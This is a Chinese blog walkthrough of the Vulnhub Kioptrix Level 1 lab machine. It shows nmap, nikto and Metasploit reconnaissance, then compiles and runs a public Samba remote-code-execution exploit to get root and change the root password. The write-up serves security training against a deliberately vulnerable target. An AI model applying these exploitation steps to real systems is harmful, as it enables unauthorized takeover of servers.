zoukankan      html  css  js  c++  java
  • PJzhang:vulnhub靶机Kioptrix系列KIOPTRIX:LEVEL 1

    猫宁~~~

    地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

    重点关注工具使用和测试思路。

    kali linux攻击机   192.168.100.4

    nmap 192.168.100.0/24

    确认靶机的IP

    Kioptrix-1.0靶机   192.168.100.5

    nmap -sV -p1-65535 192.168.100.5

    全端口扫描

    结果如下,开放22,80,139,443,系统是centos

    22   ssh   

    OpenSSH 2.9p2 (protocol 1.99)

    80   http   

    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

    111/tcp  open  rpcbind     

    2 (RPC #100000)

    139/tcp  open  netbios-ssn 

    Samba smbd (workgroup: MYGROUP)

    443/tcp  open  ssl/https   

    Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

    1024/tcp open  status      

    1 (RPC #100024)

    dirb 192.168.100.5

    扫描目录

    nikto -h 192.168.100.5

    扫描linux相关指纹与漏洞

    重点关注一下开放139端口的Samba smbd服务。

    msfconsole

    search smb

    use auxiliary/scanner/smb/smb_version

    show options

    set rhost 192.168.100.5

    run

    Host could not be identified: Unix (Samba 2.2.1a)

    searchsploit samba

    Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

    /usr/share/exploitdb/exploits/multiple/remote/10.c

    cp /usr/share/exploitdb/exploits/multiple/remote/10.c /root/10.c 

    尝试一下。

    payload地址:https://www.exploit-db.com/exploits/10

    gcc 10.c -o muma

    ./muma -d 0 -C 60 -S 192.168.100

    扫描1个C段。

    ./muma -b 0 -v 192.168.100.5

    直接获取root权限。

    uid=0(root) gid=0(root) groups=99(nobody)

    python -v

    显示python版本是1.5的

    python -c 'import pty; pty.spawn("/bin/bash")'

    无法运行

    passwd命令修改密码为123456

    经虚拟机登录上去。

  • 相关阅读:
    Spring加载机制
    SpringMVC 请求过程
    Spring事务传播机制
    数组扩容
    hashmap 底层原和扩容机制
    spring源码
    金字塔表达方式(三)如何使得一个事情变得清晰有逻辑
    金字塔表达方式(二)如何判断事情的逻辑是否正确
    C#设计模式(3)——单例模式(Singleton)
    C#设计模式(2)——工厂模式
  • 原文地址:https://www.cnblogs.com/landesk/p/13630046.html
Copyright © 2011-2022 走看看